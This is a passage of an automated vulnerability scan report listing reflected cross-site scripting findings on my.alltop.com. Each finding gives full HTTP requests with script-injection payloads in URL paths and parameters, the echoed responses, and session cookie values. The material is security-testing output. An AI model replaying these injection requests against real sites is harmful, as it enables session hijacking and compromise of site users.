Date: Tue, 08 Mar 2011 20:49:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:59 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:01 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:01 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/b/%22ns=%22netsparker(0x000167)?1219d"><script>alert(1)</script>2819410e845=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.54. http://my.alltop.com/alpha/b/%2522ns%253D%2522netsparker%25280x00016F%2529) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/b/%2522ns%253D%2522netsparker%25280x00016F%2529)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdb9a"><script>alert(1)</script>ff1b333cc02 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/bfdb9a"><script>alert(1)</script>ff1b333cc02/%2522ns%253D%2522netsparker%25280x00016F%2529) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:10 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:11 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:11 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/bfdb9a"><script>alert(1)</script>ff1b333cc02/%2522ns%253D%2522netsparker%25280x00016F%2529)" method="post" accept-charset="utf-8">
...[SNIP]...

1.55. http://my.alltop.com/alpha/b/%2522ns%253D%2522netsparker%25280x00016F%2529) [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/b/%2522ns%253D%2522netsparker%25280x00016F%2529)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d265f"><script>alert(1)</script>92094049460 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/b/%2522ns%253D%2522netsparker%25280x00016F%2529)d265f"><script>alert(1)</script>92094049460 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:18 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:20 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:20 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/b/%2522ns%253D%2522netsparker%25280x00016F%2529)d265f"><script>alert(1)</script>92094049460" method="post" accept-charset="utf-8">
...[SNIP]...

1.56. http://my.alltop.com/alpha/b/%2522ns%253D%2522netsparker%25280x00016F%2529) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/b/%2522ns%253D%2522netsparker%25280x00016F%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61e9e"><script>alert(1)</script>79aab178e4d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/b/%2522ns%253D%2522netsparker%25280x00016F%2529)?61e9e"><script>alert(1)</script>79aab178e4d=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:05 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:08 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:08 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/b/%2522ns%253D%2522netsparker%25280x00016F%2529)?61e9e"><script>alert(1)</script>79aab178e4d=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.57. http://my.alltop.com/alpha/c ['"--> parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/c

Issue detail

The value of the '"--></style></script><script>netsparker(0x00018C)</script> request parameter is copied into the HTML document as plain text between tags. The payload 9fced<script>alert(1)</script>bd34e81b8f8 was submitted in the '"--></style></script><script>netsparker(0x00018C)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/c?'"--></style></script><script>netsparker(0x00018C)</script>9fced<script>alert(1)</script>bd34e81b8f8 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:18 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:18 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:18 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>9fced<script>alert(1)</script>bd34e81b8f8" method="post" accept-charset="utf-8">
...[SNIP]...

1.58. http://my.alltop.com/alpha/c [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/c

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34a26"><script>alert(1)</script>426f2377b29 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/c34a26"><script>alert(1)</script>426f2377b29 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:43 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:46 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:46 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/c34a26"><script>alert(1)</script>426f2377b29" method="post" accept-charset="utf-8">
...[SNIP]...

1.59. http://my.alltop.com/alpha/c [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/c

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dd77"><script>alert(1)</script>4ca4dc8f88d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/c?2dd77"><script>alert(1)</script>4ca4dc8f88d=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:40 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:40 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:40 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/c?2dd77"><script>alert(1)</script>4ca4dc8f88d=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.60. http://my.alltop.com/alpha/c [nsextt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/c

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea909"><script>alert(1)</script>5abb68af84 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/c?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000FC)%3C/script%3Eea909"><script>alert(1)</script>5abb68af84 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:32 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:34 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:34 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/c?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000FC)%3C/script%3Eea909"><script>alert(1)</script>5abb68af84" method="post" accept-charset="utf-8">
...[SNIP]...

1.61. http://my.alltop.com/alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dc71"><script>alert(1)</script>956351dc9d0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/c'%22--%3E%3C3dc71"><script>alert(1)</script>956351dc9d0/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:28 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:30 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:30 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/c'%22--%3E%3C3dc71"><script>alert(1)</script>956351dc9d0/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.62. http://my.alltop.com/alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb328"><script>alert(1)</script>6edab67d23c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/c'%22--%3E%3C/style%3E%3Ceb328"><script>alert(1)</script>6edab67d23c/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
